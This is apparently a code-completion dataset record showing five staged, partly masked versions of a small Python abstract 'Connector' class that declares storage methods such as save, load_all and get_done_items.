"step-1": "<mask token>\n\n\nclass Connector:\n <mask token>\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Connector:\n <mask token>\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n <mask token>\n\n @abc.abstractmethod\n def get_last_id(self):\n pass\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Connector:\n <mask token>\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n\n @abc.abstractmethod\n def update_item(self, item):\n pass\n\n @abc.abstractmethod\n def get_last_id(self):\n pass\n\n @abc.abstractmethod\n def get_done_items(self):\n pass\n <mask token>\n",
"step-4": "<mask token>\n\n\nclass Connector:\n \"\"\"@abc.abstractmethod\n def connect(self):\n pass\n \"\"\"\n\n @abc.abstractmethod\n def save(self, item):\n pass\n\n @abc.abstractmethod\n def load_all(self):\n pass\n\n @abc.abstractmethod\n def load_by_id(self, id):\n pass\n\n @abc.abstractmethod\n def update_item(self, item):\n pass\n\n @abc.abstractmethod\n def get_last_id(self):\n pass\n\n @abc.abstractmethod\n def get_done_items(self):\n pass\n \"\"\"@abc.abstractmethod\n def close(self):\n pass\"\"\"\n",
"step-5": "import abc\r\n\r\n\r\nclass Connector:\r\n\r\n\r\n \"\"\"@abc.abstractmethod\r\n def connect(self):\r\n pass\r\n \"\"\"\r\n \r\n @abc.abstractmethod\r\n def save(self, item):\r\n pass\r\n \r\n\r\n @abc.abstractmethod\r\n def load_all(self):\r\n pass\r\n \r\n \r\n @abc.abstractmethod\r\n def load_by_id(self, id):\r\n pass\r\n\r\n \r\n @abc.abstractmethod\r\n def update_item(self, item):\r\n pass\r\n\r\n\r\n @abc.abstractmethod\r\n def get_last_id(self):\r\n pass\r\n\r\n\r\n @abc.abstractmethod\r\n def get_done_items(self):\r\n pass \r\n \r\n \r\n \"\"\"@abc.abstractmethod\r\n def close(self):\r\n pass\"\"\"\r\n\r\n \r\n\r\n",
"step-ids": [
4,
5,
7,
8,
10
]
}
|
[
4,
5,
7,
8,
10
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.